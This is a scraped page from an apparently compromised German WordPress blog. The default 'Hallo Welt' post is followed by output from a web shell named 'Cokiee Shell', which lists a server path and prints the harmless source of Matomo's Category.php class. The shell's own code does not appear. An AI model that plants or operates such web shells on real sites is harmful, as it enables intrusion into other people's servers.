Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /var/www/web28/html/wp-content/plugins/matomo/app/core/Category/ |
Current File : //var/www/web28/html/wp-content/plugins/matomo/app/core/Category/Category.php |
<?php /** * Matomo - free/libre analytics platform * * @link https://matomo.org * @license https://www.gnu.org/licenses/gpl-3.0.html GPL v3 or later */ namespace Piwik\Category; use Piwik\Piwik; /** * Base type for category. lets you change the name for a categoryId and specify a different order * so the category appears eg at a different order in the reporting menu. * * This class is for now not exposed as public API until needed. Categories of plugins will be automatically * displayed in the menu at the very right after all core categories. */ class Category { /** * The id of the category as specified eg in {@link Piwik\Widget\WidgetConfig::setCategoryId()`} or * {@link Piwik\Report\getCategoryId()}. The id is used as the name in the menu and will be visible in the * URL. * * @var string Should be a translation key, eg 'General_Vists' */ protected $id = ''; /** * @var Subcategory[] */ protected $subcategories = array(); /** * The order of the category. The lower the value the further left the category will appear in the menu. * @var int */ protected $order = 99; /** * The icon for this category, eg 'icon-user' * @var int */ protected $icon = ''; /** * Optional widget spec to replace the category in the reporting menu, e.g. Marketplace.RichMenuButton * * @var string */ protected $widget = ''; /** * @param int $order * @return static */ public function setOrder($order) { $this->order = (int) $order; return $this; } public function getOrder() { return $this->order; } public function setId($id) { $this->id = $id; return $this; } public function getId() { return $this->id; } public function getDisplayName() { return Piwik::translate($this->getId()); } public function addSubcategory(\Piwik\Category\Subcategory $subcategory) { $subcategoryId = $subcategory->getId(); if ($this->hasSubcategory($subcategoryId)) { throw new \Exception(sprintf('Subcategory %s already exists for category %s', $subcategoryId, $this->getId())); } $this->subcategories[$subcategoryId] = $subcategory; } public function hasSubcategory($subcategoryId) { return isset($this->subcategories[$subcategoryId]); } public function getSubcategory($subcategoryId) { if ($this->hasSubcategory($subcategoryId)) { return $this->subcategories[$subcategoryId]; } } /** * @return Subcategory[] */ public function getSubcategories() { return array_values($this->subcategories); } public function hasSubCategories() { return !empty($this->subcategories); } public function setIcon($icon) { $this->icon = $icon; return $this; } public function getIcon() { return $this->icon; } public function setWidget(string $widget) : self { $this->widget = $widget; return $this; } public function getWidget() : string { return $this->widget; } /** * Get the help text (if any) for this category. * @return null */ public function getHelp() { return null; } }
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare